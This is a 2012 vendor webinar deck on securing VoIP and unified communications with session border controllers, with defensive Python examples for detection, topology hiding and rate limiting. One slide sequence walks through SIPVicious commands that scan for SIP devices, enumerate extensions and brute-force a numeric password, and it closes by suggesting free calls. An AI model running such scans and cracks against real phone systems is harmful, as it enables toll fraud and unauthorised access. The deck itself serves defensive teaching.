February, 2012



Securing your Unified Communications Borders with Acme Packet - in association with The SIP School

Patrick McNeil, CISSP
Acme Packet Premium Services

Graham Francis
CEO The SIP School

The SIP School

• Founded in April 2000
• 5500+ Students
• Provide the Industry recognised SSCA® SIP Certification
  program, endorsed by the TIA + more.
• eLearning in modular format
• Unique as content evolves as SIP evolves
• Connected with Acme Packet to provide SIP foundation
  training
• http://www.thesipschool.com / Discount codes later.
• Now let’s start by looking at the challenges in securing
  unified communications.




The Unified Communications security challenge

Adopt enterprise-wide IP communications to improve collaboration and productivity...

…. All without increasing your risk profile

Unified Communications services are a prominent target

October 2010 - SIPVicious port 5060 scans lead to €11 million loss

March 2011 – Romania - Former employee held - Forged VoIP pins created

May 2011 - Hudson County, New Jersey Man Pleads Guilty to $4.4 Million VoIP Fraud Scheme

November 2011 - Philippine phone phreakers arrested after defrauding AT&T out of $2 Million to fund terrorists

UC services are an easy target

• IP networks are inherently insecure
   – Developed without security in mind
• Organizations rely on IP networks to conduct business
   – Multimodal communications difficult to control
• Confidential information freely exchanged by users that
  don’t understand how it is transmitted




Cybercrime is organized

• Knowledge, tools and techniques are shared openly
• May have goals motivated by politics or profit
• Commoditized sale of both the tools and results of the trade
   – Computing time on a botnet
   – “Fake” calling cards
   – Long distance calling with disposable phones
   – Number hijacking
   – Toll / international bypass




What are the threats?

How are UC services established?
Items in red might reveal sensitive information

SIP signaling:

INVITE sip:15559191212@serviceprovider.com SIP/2.0
Via: SIP/2.0/UDP 10.1.3.3:5060;branch=z9hG4bKb27061747269636b
From: "JConnor" <sip:15554141337@10.1.3.3:5060>;tag=18de4db33f
To: "15559191212" <sip:15559191212@serviceprovider.com>
Call-ID: 19424e0d9187654209ed34db33f
CSeq: 1 INVITE
Max-Forwards: 70
User-Agent: BigTelcoVendor/R16.4.1.1
Supported: 100rel,timer,replaces,join,histinfo
Allow: INVITE,CANCEL,BYE,ACK,NOTIFY,REFER,OPTIONS,INFO,PUBLISH
Contact: "JConnor" <sip:15554141337@10.1.3.3:5060;transport=udp>
Content-Type: application/sdp
Content-Length: 165

SDP media description:

v=0
o=- 1 1 IN IP4 10.1.3.3
s=-
c=IN IP4 10.1.3.3
b=AS:64
t=0 0
m=audio 19001 RTP/AVP 0 127
a=rtpmap:0 PCMU/8000
a=rtpmap:127 telephone-event/8000

How are your services targeted?

The OSI Model Layers

Application     Voice or video devices, chat, session recording, web integrated real-time communications applications
Presentation    CODECs (DSP)
Session         SIP, H323, MGCP, H248, TLS (signaling); RTP, RTCP (media)
Transport       TCP, UDP, SCTP
Network         IPv4, IPv6, NAT, IPsec
Data Link       Data link technology that supports the transport of IP
Physical        Physical technology that supports the transport of data link frames

[Diagram label: Session Delivery Targets]

Exploits focused at the middle layers of the OSI model tend to get around traditional security implementations since the whole point is to allow services

The penetration campaign

Reconnaissance -> Enumeration -> Attack (Gaining access -> Maintaining access -> Covering tracks)

  Reconnaissance: Information gathering
  Enumeration: Port scanning, OS fingerprinting, Service detection
  Attack: Attack, gain and maintain access, and cover tracks

  •   Initial phases of an organized attack can easily go undetected
  •   Stopping or making the early phases of an attack difficult can
      avoid service outage or fraud

What are the threats?

Threat                                    Potential Result
Reconnaissance scan                       Preparation for targeted denial of service, fraud, or theft of service
Session overloads                         Denial of service
Protocol fuzzing                          Denial of service
SPAM over Internet Telephony (SPIT)       Targeted denial of service, fraud, breach of privacy
Call Interception or Session Hijacking    Targeted denial of service, breach of privacy, fraud, theft
Eavesdropping                             Breach of privacy, fraud, theft
Media injection                           Denial of service, fraud, theft

Which threats are seen the most?

Overload
Resource consumption
Availability disruption

[Diagram labels: Attackers, DoS/DDoS, Internet, Unintentional Overload, SIP Provider OR Internal Network, Internal]

Which threats are seen the most?

Theft of services / fraud
Large phone bills
Investigation costs

[Diagram labels: Attackers, Internet, SIP Provider OR Internal Network, Premium Rate Center, Internal]

Which threats are seen the most?

SPAM / SPIT
Nuisance
Social Engineering

[Diagram labels: Attackers, Internet, SIP Provider OR Internal Network, Internal Threat, Internal]

Not as much…

“Man in the middle”
Session-hijacking
Media injection
Eavesdropping

[Diagram labels: Attacker, Remote Control, Internet, SIP Provider OR Internal Network, Internal Threat, Internal]

A simple example using SIPVicious
I just went to your website and got the phone numbers for HR, Support, Investor Relations, etc., and they all seem to end with 1xxx…

Scan the IP range registered to your company as reported by ARIN

root@bt:/pentest/voip/sipvicious# ./svmap.py -p5060-5061 192.168.133.0/24
| SIP Device           | User Agent   | Fingerprint                            |
--------------------------------------------------------------------------------
| 192.168.133.128:5060 | Asterisk PBX | Asterisk / SJphone/1.60.289a (SJ Labs) |

Enumerate extensions …

root@bt:/pentest/voip/sipvicious# ./svwar.py -e1000-9999 192.168.133.128
------------------------------
| 1005      | reqauth        |
| 1004      | reqauth        |
| 1003      | reqauth        |
| 1002      | noauth         |
| 1001      | reqauth        |

We got one extension without a password! It must be misconfigured.
Look for numeric passwords for another extension …

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u1001 -r1000-999999 192.168.133.128
| Extension | Password |
------------------------
| 1001      | 1234     |

Now just register a couple of soft phones and make free calls!

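Seen from the defender's side, the extension sweep and the password guessing shown above stand out in registrar logs. The following added example (not part of the original slides) flags both, plus an extension that accepts a REGISTER without ever being challenged; the one-line log format, the addresses and the thresholds are assumptions constructed for the illustration.

```python
import re
from collections import defaultdict, deque

# Hypothetical log format, one SIP response per line:
#   <epoch-seconds> <source-ip> REGISTER <extension> <status-code>
LINE = re.compile(r"^(\d+) (\S+) REGISTER (\d+) (\d{3})$")


def build_constructed_log():
    """Constructed sample data mirroring the sweep and guessing on the slide."""
    lines = ["100 10.0.0.15 REGISTER 1003 401",   # normal phone: challenged ...
             "100 10.0.0.15 REGISTER 1003 200"]   # ... then authenticated
    scanner = "203.0.113.50"                      # documentation address
    for i, ext in enumerate(range(1000, 1040)):   # sweep over extensions
        status = 200 if ext == 1002 else 401 if 1001 <= ext <= 1005 else 404
        lines.append(f"{200 + i // 10} {scanner} REGISTER {ext} {status}")
    for i in range(30):                           # repeated failures on 1001
        lines.append(f"{300 + i // 10} {scanner} REGISTER 1001 401")
    lines.append(f"303 {scanner} REGISTER 1001 200")
    return "\n".join(lines)


def parse(log):
    """Return (ts, src, ext, status) tuples, skipping lines that do not match."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:
            events.append((int(m[1]), m[2], m[3], int(m[4])))
    return events


def detect(events, window=60, enum_threshold=20, guess_threshold=10):
    """Flag per-source behaviour inside a sliding window of `window` seconds."""
    findings = set()
    probed = defaultdict(deque)   # src -> (ts, ext) of rejected REGISTERs
    failed = defaultdict(deque)   # (src, ext) -> ts of 401/403 responses
    challenged = {}               # (src, ext) -> ts of the last 401/403
    # Stable sort on the timestamp keeps same-second events in log order.
    for ts, src, ext, status in sorted(events, key=lambda e: e[0]):
        key = (src, ext)
        if status in (401, 403, 404):
            q = probed[src]
            q.append((ts, ext))
            while q[0][0] < ts - window:
                q.popleft()
            if len({e for _, e in q}) >= enum_threshold:
                findings.add(("enumeration", src, "*"))
        if status in (401, 403):
            # A single 401 is the normal digest challenge; many are not.
            f = failed[key]
            f.append(ts)
            while f[0] < ts - window:
                f.popleft()
            if len(f) >= guess_threshold:
                findings.add(("password-guessing", src, ext))
            challenged[key] = ts
        elif status == 200:
            if ts - challenged.get(key, float("-inf")) > window:
                # Heuristic for the "noauth" case: success with no challenge.
                findings.add(("accepted-without-challenge", src, ext))
            elif ("password-guessing", src, ext) in findings:
                findings.add(("guessed-credentials", src, ext))
    return findings


if __name__ == "__main__":
    for finding in sorted(detect(parse(build_constructed_log()))):
        print(finding)
```

The accepted-without-challenge rule is a heuristic: a registrar that lets clients reuse a nonce for longer than the window will need a larger window.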
BUT, wasn’t analog TDM safer? NO!

We still saw:
• Eavesdropping
• Media injection
• Caller impersonation
• Toll fraud
• Physical attacks




How does Acme Packet secure Unified Communications services?

Net-Net E-SBCs control and secure network borders

[Diagram labels: Enterprise, Service Provider; services shown: IP telephony, Conferencing, CRM, Tele-presence, Contact center]

Strong security
   • Network border protection
   • Privacy
Easy interoperability
   • SIP interoperability
   • Protocol interworking
Assured reliability
   • Quality user experience
   • Resilient services

Net-SAFE™
Session-Aware Filtering & Enforcement

 •   Hardware & Software DoS/DDoS prevention
 •   Hardware-accelerated encryption & authentication
 •   Dynamic and Static Access control lists
 •   Protocol enforcement and interoperability
 •   Topology hiding and NAT
 •   Session overload protection (upstream/downstream)
 •   Regulatory compliance / legal intercept to recorder
 •   Fraud prevention / endpoint trust management
 •   Routing, high availability and load balancing


[Diagram labels: HW DoS policy + ACLs, SW DoS policy, Endpoint Trust Management, Routing / Availability, Threshold Management, Session Management, Destination, Discard]

Confidentiality

[Diagram: security triad of confidentiality, integrity, availability]

Ensure that information is not disclosed to unauthorized parties

Remove identifying data

Obscure the internal structure of your network and services so attackers don’t know what or how to attack

• Back to Back User Agent (B2BUA) - terminates and re-originates all sessions so we can manipulate them

• Topology Hiding – modify or strip signaling message parts that might reveal your internal network or telephony topology

Message entering the SBC:
  From: JConnor @ my desk
  To: Customer
  Via: My PBX
  Route: PBX, SBC
  Phone: Brand X Desk Phone, software version x.y.z.1
  Send Audio: To my phone
  Vendor Specific: Location

Message leaving the SBC:
  From: CorpUser @ SBC
  To: Customer
  Via: SBC
  Route: SBC
  Send Audio: To SBC

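Topology hiding applied to the INVITE from the "How are UC services established?" slide, as an added example that is not Acme Packet code and not part of the original slides. It re-originates the signaling leg the way the B2BUA bullet describes and then checks what still leaks; the SBC addresses (192.0.2.10, 192.0.2.11), relay port 40000, the "CorpUser" alias and the list of dropped headers are assumptions.

```python
import ipaddress
import re
import secrets

# The INVITE from the earlier slide, with CRLF line endings as on the wire.
SLIDE_INVITE = "\r\n".join([
    "INVITE sip:15559191212@serviceprovider.com SIP/2.0",
    "Via: SIP/2.0/UDP 10.1.3.3:5060;branch=z9hG4bKb27061747269636b",
    'From: "JConnor" <sip:15554141337@10.1.3.3:5060>;tag=18de4db33f',
    'To: "15559191212" <sip:15559191212@serviceprovider.com>',
    "Call-ID: 19424e0d9187654209ed34db33f",
    "CSeq: 1 INVITE",
    "Max-Forwards: 70",
    "User-Agent: BigTelcoVendor/R16.4.1.1",
    "Supported: 100rel,timer,replaces,join,histinfo",
    "Allow: INVITE,CANCEL,BYE,ACK,NOTIFY,REFER,OPTIONS,INFO,PUBLISH",
    'Contact: "JConnor" <sip:15554141337@10.1.3.3:5060;transport=udp>',
    "Content-Type: application/sdp",
    "Content-Length: 165",
    "",
    "v=0", "o=- 1 1 IN IP4 10.1.3.3", "s=-", "c=IN IP4 10.1.3.3", "b=AS:64",
    "t=0 0", "m=audio 19001 RTP/AVP 0 127", "a=rtpmap:0 PCMU/8000",
    "a=rtpmap:127 telephone-event/8000", "",
])

DROP = {"user-agent", "server", "organization"}   # assumed banner headers
URI_HOST = re.compile(r"(<sip:[^@>]+@)[^;>]+")     # host[:port] inside <sip:...>
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def hide_topology(msg, sbc_sig="192.0.2.10:5060", sbc_media="192.0.2.11",
                  sbc_port=40000, alias="CorpUser"):
    """Rewrite an outbound INVITE so only the SBC is visible to the far side."""
    head, _, body = msg.partition("\r\n\r\n")
    lines = head.split("\r\n")
    out = [lines[0]]                       # request line already targets the provider
    for line in lines[1:]:
        name, _, value = line.partition(":")
        key, value = name.strip().lower(), value.strip()
        if key in DROP or key in ("via", "content-length"):
            continue                       # inner Via path and banners are not forwarded
        if key in ("from", "contact"):
            # Keep the calling number, replace the internal host and display name.
            value = URI_HOST.sub(lambda m: m.group(1) + sbc_sig, value)
            value = re.sub(r'^"[^"]*"', f'"{alias}"', value)
        if key == "from":
            value = re.sub(r"tag=[^;]+", "tag=" + secrets.token_hex(5), value)
        if key == "call-id":               # new dialog identifier on the outer leg
            value = secrets.token_hex(12) + "@" + sbc_sig.split(":")[0]
        out.append(f"{name.strip()}: {value}")
    # A single Via naming the SBC; branch starts with the RFC 3261 magic cookie.
    out.insert(1, f"Via: SIP/2.0/UDP {sbc_sig};branch=z9hG4bK{secrets.token_hex(8)}")
    sdp = []
    for l in body.split("\r\n"):
        if l.startswith(("o=", "c=")):     # anchor media on the SBC address
            l = IPV4.sub(sbc_media, l)
        elif l.startswith("m="):           # and on the SBC's relay port
            l = re.sub(r"^(m=\w+ )\d+", lambda m: m.group(1) + str(sbc_port), l)
        sdp.append(l)
    body = "\r\n".join(sdp)
    out.append(f"Content-Length: {len(body.encode())}")
    return "\r\n".join(out) + "\r\n\r\n" + body


def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918)


def internal_leaks(msg):
    """RFC 1918 addresses and software banners still present in a message."""
    leaks = sorted({ip for ip in IPV4.findall(msg) if is_internal(ip)})
    leaks += [l for l in msg.split("\r\n")
              if l.lower().startswith(("user-agent:", "server:"))]
    return leaks


if __name__ == "__main__":
    print("before:", internal_leaks(SLIDE_INVITE))
    print("after: ", internal_leaks(hide_topology(SLIDE_INVITE)))
```

Running `internal_leaks` on traffic captured outside the border is a quick check that the hiding policy covers every header and SDP line that carries an internal address.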
Authorize and encrypt for privacy and control

Signaling or media traffic going across an untrusted network should be encrypted to avoid eavesdropping or hijacking, and assure message integrity

• Fast hardware-accelerated encryption
• Encryption specified on boundary by boundary basis
• Can ensure non-repudiation

[Diagram labels: Enterprise, Private network, Campus, Branch, Internet, Legitimate session, TLS-encrypted session, Sniffing]

Integrity

[Diagram: security triad of confidentiality, integrity, availability]

Data and systems are not modified or used maliciously or accidentally

Assure message integrity

Verify the integrity of signaling and media that enters your network to prevent service disruption

• Attacks are dropped at the network processor and won’t impact the CPU or memory
• Signaling is decomposed and analyzed for validity against RFC requirements

[Diagram: E-SBC architecture. Labels: Signaling, Media, Network Interface, Network Encryption, Classifier, Traffic Manager, Parser, Policing Engine, Protocol Manipulation, Routing, UAS/UAC, Session Control Function, Media Control Function, Network Processor, Host Based Software, Embedded Software]

Prevent fraudulent calls

Monitor violations of call thresholds to spot misbehaving hosts, and analyze call detail records to detect fraud patterns

• Routing rules can refuse traffic to premium or fraudulent rate centers
• SNMP traps to management station indicate potential abuse
• Call Detail Record (CDR) feeds can be sent “off box” for analysis including metrics for call quality

[Diagram labels: attacker, management station]

Availability

[Diagram: security triad of confidentiality, integrity, availability]

Reliability and accessibility of data and resources to authorized individuals in a timely manner

Denial of Service (DoS) protection

Assume hosts are untrusted until they verify their identity through authentication and/or other actions. Establish thresholds to protect against compromised or unintentionally misbehaving hosts

• Initial trust level and message thresholds enforced
• Depending on their actions, hosts will be promoted to trusted status or demoted to untrusted or denied status
• Queues based on trust level make sure services are available even while under DoS attack

[Diagram: Dynamic Trust Levels - Trusted, Untrusted, Deny]

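A small model of the dynamic trust levels described above, as an added example that is not Acme Packet's implementation and not part of the original slides. Hosts start untrusted, are promoted after authenticating, are demoted when they exceed their message threshold or send invalid messages, and are served from per-trust queues; all thresholds, the deny period and the addresses are assumptions.

```python
from collections import defaultdict, deque
from enum import Enum


class Trust(Enum):
    DENY = 0
    UNTRUSTED = 1
    TRUSTED = 2


class TrustPolicer:
    def __init__(self, window=1.0, limits=None, max_invalid=3, deny_secs=30.0):
        self.window = window                  # seconds per counting window
        self.limits = limits or {Trust.UNTRUSTED: 4, Trust.TRUSTED: 20}
        self.max_invalid = max_invalid        # malformed messages tolerated
        self.deny_secs = deny_secs
        self.level = defaultdict(lambda: Trust.UNTRUSTED)   # initial trust level
        self.seen = defaultdict(deque)        # src -> timestamps in the window
        self.invalid = defaultdict(int)
        self.deny_until = {}
        self.queues = {Trust.TRUSTED: deque(), Trust.UNTRUSTED: deque()}

    def _demote(self, src, now):
        if self.level[src] is Trust.TRUSTED:
            self.level[src] = Trust.UNTRUSTED
        else:
            self.level[src] = Trust.DENY
            self.deny_until[src] = now + self.deny_secs
            # Work already queued for a denied host is discarded.
            q = self.queues[Trust.UNTRUSTED]
            self.queues[Trust.UNTRUSTED] = deque(m for m in q if m[0] != src)
        self.seen[src].clear()
        self.invalid[src] = 0

    def promote(self, src):
        """Call when the host has verified its identity (e.g. authenticated)."""
        if self.level[src] is not Trust.DENY:
            self.level[src] = Trust.TRUSTED
            self.invalid[src] = 0

    def admit(self, src, now, msg, valid=True):
        """Return True and queue msg if src is within its threshold at time now."""
        if self.level[src] is Trust.DENY:
            if now < self.deny_until[src]:
                return False
            self.level[src] = Trust.UNTRUSTED      # deny period over: start again
        recent = self.seen[src]
        while recent and recent[0] <= now - self.window:
            recent.popleft()
        if not valid:                              # failed protocol validation
            self.invalid[src] += 1
            if self.invalid[src] >= self.max_invalid:
                self._demote(src, now)
            return False
        if len(recent) >= self.limits[self.level[src]]:
            self._demote(src, now)
            return False
        recent.append(now)
        self.queues[self.level[src]].append((src, msg))
        return True

    def drain(self, budget, untrusted_reserve=1):
        """Serve trusted traffic first, keeping a small reserve so that
        new hosts can still get through to authenticate."""
        served = []
        t, u = self.queues[Trust.TRUSTED], self.queues[Trust.UNTRUSTED]
        reserve = min(untrusted_reserve, len(u), budget)
        while t and len(served) < budget - reserve:
            served.append(t.popleft())
        while u and len(served) < budget:
            served.append(u.popleft())
        while t and len(served) < budget:
            served.append(t.popleft())
        return served


def simulate():
    """Constructed scenario: one registered phone and one flooding host."""
    p = TrustPolicer()
    phone, flood = "10.0.0.15", "198.51.100.7"
    p.admit(phone, 0.0, "REGISTER")
    p.promote(phone)                               # registrar accepted its credentials
    flood_ok = sum(p.admit(flood, 0.1 + i * 0.01, "INVITE") for i in range(50))
    phone_ok = sum(p.admit(phone, 0.2 + i * 0.01, "INVITE") for i in range(15))
    return p, flood_ok, phone_ok
```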
Manage service capacities

Understand the capacities of your services and limit access so they do not become overwhelmed

 • Thresholds per session agent
     –   Sessions
     –   Burst rate
     –   Sustained rate
     –   Status
 • Variable load balancing

Values shown in the diagram:

Share   Sessions   Burst-rate   Sustained
50%     500        10 cps       8 cps
30%     300        5 cps        4 cps
20%     200        4 cps        3 cps

Make UC services resilient

Implement hardware and/or site redundancy to minimize the impact of physical attacks to building, power, network, etc.

High Availability
• No loss of active sessions
• Active / Standby failover in 40ms
• Checkpointing configuration, media & signaling state
• Preserves CDRs on failover

Multi-site failover
• Multiple SIP trunks improve network resiliency in disaster recovery scenarios
• SBC enables fast failover without operator intervention

Security Architecture

Trust zones provide flexibility

Use the SBC to create a virtual firewall DMZ architecture to create multiple zones with different trust levels

[Diagram labels: zones Internet, Partner, Outsourcer, Core / Backbone, Internal (each SIP or H.323); trust levels Low Trust, Medium Trust, High Trust; Routing and Interworking of signaling (Sig) and media between the zones]

Security for SIP trunking applications

Run data firewalls and Acme Packet SBCs in parallel to manage data and communications services in the optimal location

[Diagram labels: SIP / MPLS Provider, Internet, or any Untrusted Network; DMZ; Acme Packet SBC HA Pair; Data Network or VLAN; UC Network or VLAN]

Security for remote worker access

Send remote users to the SBC instead of your VPN concentrator for message verification, throttling, and best performance without the need for a VPN client

•    SIP message integrity verification
•    SBC can cache client registration, responding to regular client keep-alives
•    Confidentiality through signaling and media encryption
•    Easier connectivity & traversal through local firewalls vs. VPN solutions - especially while travelling

[Diagram labels: Data centers, Internet, VPN, Teleworker, TLS/SRTP to SBC vs VPN Tunnel]

Common Questions

“Why do I need a SBC when the service provider has one?”

• Integrity: The Service Provider SBC is there to protect themselves from you
• Availability: Routing to SIP gateways and service providers
• Interop / Confidentiality: SIP normalization and topology hiding
• Quality of Service: Call routing can be dynamically driven by call quality

[Diagram labels: Service Provider; Customer 1,2,3 ….]

“What do I tell my security department?”

• 1,525 customers in 107 countries – the industry standard
• Processes calls through both general IP and UC specific attacks
• Acme Packet Net-Net SBC certified by the U.S. DISA JITC at Ft. Huachuca, AZ for information assurance and interoperability in DoD networks
• Can work in a firewall DMZ if best practices are followed

Summary

Don’t forget to think holistically…

Physical security – locks, badges, lighting, emergency exits
Data security - 802.1x, LLDP, firewalls, ACLs, VLAN strategy, internal encryption, administrative interfaces, QoS marking and measurement
Host security - Anti-virus, control of third party apps and endpoints, patching and configuration of end devices, asset acquisition and disposal
Disaster recovery – redundant hardware, services, network
Compensating controls - CDR analysis to prevent or detect insider abuse, logging, video surveillance; internal scans or penetration testing
Internal controls - hiring policies and security reviews
Employee training programs – best practices guidelines and clear expectations; educate employees to recognize social engineering

Additional resources

Acme Packet services, training, sales, or partners
http://www.acmepacket.com/
The SIP School
http://www.thesipschool.com/

Back | Track Linux VoIP wiki pages
http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

Voice Over IP Security Alliance (VOIPSA)
http://voipsa.org

The SIP Forum
http://www.sipforum.org/

Your service provider




Questions?
Thank you


•   sales@acmepacket.com
•   info@thesipschool.com
•   The SIP School Discount Code = APDC2204
•   Link to webinar recording will be e-mailed to all registered
    participants





Accelerate Microsoft Lync Deployments with Session Border ControllersAccelerate Microsoft Lync Deployments with Session Border Controllers
Accelerate Microsoft Lync Deployments with Session Border Controllers
 
Unified Communications.com presentation
Unified Communications.com presentationUnified Communications.com presentation
Unified Communications.com presentation
 
Audio codes one voice for lync
Audio codes one voice for lyncAudio codes one voice for lync
Audio codes one voice for lync
 
One Voice For Hosted Services
One Voice For Hosted ServicesOne Voice For Hosted Services
One Voice For Hosted Services
 
Concurrency presentation
Concurrency presentationConcurrency presentation
Concurrency presentation
 
Simplifying and enabling rcs service delivery
Simplifying and enabling rcs service deliverySimplifying and enabling rcs service delivery
Simplifying and enabling rcs service delivery
 
Office 365 PBX Replacement Comparison Guide
Office 365 PBX Replacement Comparison GuideOffice 365 PBX Replacement Comparison Guide
Office 365 PBX Replacement Comparison Guide
 
Unify Your Unified Communications Australia
Unify Your Unified Communications AustraliaUnify Your Unified Communications Australia
Unify Your Unified Communications Australia
 
Concurrency Security Summit presentation
Concurrency Security Summit presentationConcurrency Security Summit presentation
Concurrency Security Summit presentation
 
What's up with SIP?
What's up with SIP?What's up with SIP?
What's up with SIP?
 
The AudioCodes SBC Family
The AudioCodes SBC FamilyThe AudioCodes SBC Family
The AudioCodes SBC Family
 
SIP Trunking Case Study (Medtronic) Part 2
SIP Trunking Case Study (Medtronic) Part 2SIP Trunking Case Study (Medtronic) Part 2
SIP Trunking Case Study (Medtronic) Part 2
 
Ready for the Evolution: LTE Session delivery requirements
Ready for the Evolution: LTE Session delivery requirementsReady for the Evolution: LTE Session delivery requirements
Ready for the Evolution: LTE Session delivery requirements
 
Cloud PBX with Office 365 Webinar Slides
Cloud PBX with Office 365 Webinar SlidesCloud PBX with Office 365 Webinar Slides
Cloud PBX with Office 365 Webinar Slides
 

Ähnlich wie Securing UC Borders with Acme Packet

S series presentation
S series presentationS series presentation
S series presentationSergey Marunich
 
F5's IP Intelligence Service
F5's IP Intelligence ServiceF5's IP Intelligence Service
F5's IP Intelligence ServiceF5 Networks
 
Analysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence ProcedureAnalysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence Procedureijsrd.com
 
Securing VoIP Networks
Securing VoIP NetworksSecuring VoIP Networks
Securing VoIP NetworksGENBANDcorporate
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksRohan Fernandes
 
Bapinger Network Security
Bapinger Network SecurityBapinger Network Security
Bapinger Network SecurityDjadja Sardjana
 
76 s201919
76 s20191976 s201919
76 s201919IJRAT
 
PCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio PanadaPCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio PanadaIBM Danmark
 
An approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptxAn approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptxamalouwarda1
 
6 Steps to SIP trunking security
6 Steps to SIP trunking security6 Steps to SIP trunking security
6 Steps to SIP trunking securityFlowroute
 
Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security Lancope, Inc.
 
Modern Lessons in Security Monitoring
Modern Lessons in Security MonitoringModern Lessons in Security Monitoring
Modern Lessons in Security MonitoringAnton Goncharov
 
Information Security
Information SecurityInformation Security
Information SecurityMohit8780
 
Askozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, EnglishAskozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, EnglishAskozia
 
Insider threats webinar 01.28.15
Insider threats webinar 01.28.15Insider threats webinar 01.28.15
Insider threats webinar 01.28.15Lancope, Inc.
 
VoIP security
VoIP securityVoIP security
VoIP securityMile Blenton
 
Voippresentation
VoippresentationVoippresentation
Voippresentationeliran2
 
Securty Issues from 1999
Securty Issues from 1999Securty Issues from 1999
Securty Issues from 1999TomParker
 

Ähnlich wie Securing UC Borders with Acme Packet (20)

S series presentation
S series presentationS series presentation
S series presentation
 
F5's IP Intelligence Service
F5's IP Intelligence ServiceF5's IP Intelligence Service
F5's IP Intelligence Service
 
285 288
285 288285 288
285 288
 
285 288
285 288285 288
285 288
 
Analysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence ProcedureAnalysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence Procedure
 
Securing VoIP Networks
Securing VoIP NetworksSecuring VoIP Networks
Securing VoIP Networks
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
 
Bapinger Network Security
Bapinger Network SecurityBapinger Network Security
Bapinger Network Security
 
76 s201919
76 s20191976 s201919
76 s201919
 
PCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio PanadaPCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio Panada
 
An approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptxAn approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptx
 
6 Steps to SIP trunking security
6 Steps to SIP trunking security6 Steps to SIP trunking security
6 Steps to SIP trunking security
 
Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security
 
Modern Lessons in Security Monitoring
Modern Lessons in Security MonitoringModern Lessons in Security Monitoring
Modern Lessons in Security Monitoring
 
Information Security
Information SecurityInformation Security
Information Security
 
Askozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, EnglishAskozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, English
 
Insider threats webinar 01.28.15
Insider threats webinar 01.28.15Insider threats webinar 01.28.15
Insider threats webinar 01.28.15
 
VoIP security
VoIP securityVoIP security
VoIP security
 
Voippresentation
VoippresentationVoippresentation
Voippresentation
 
Securty Issues from 1999
Securty Issues from 1999Securty Issues from 1999
Securty Issues from 1999
 

KĂźrzlich hochgeladen

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂşjo
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
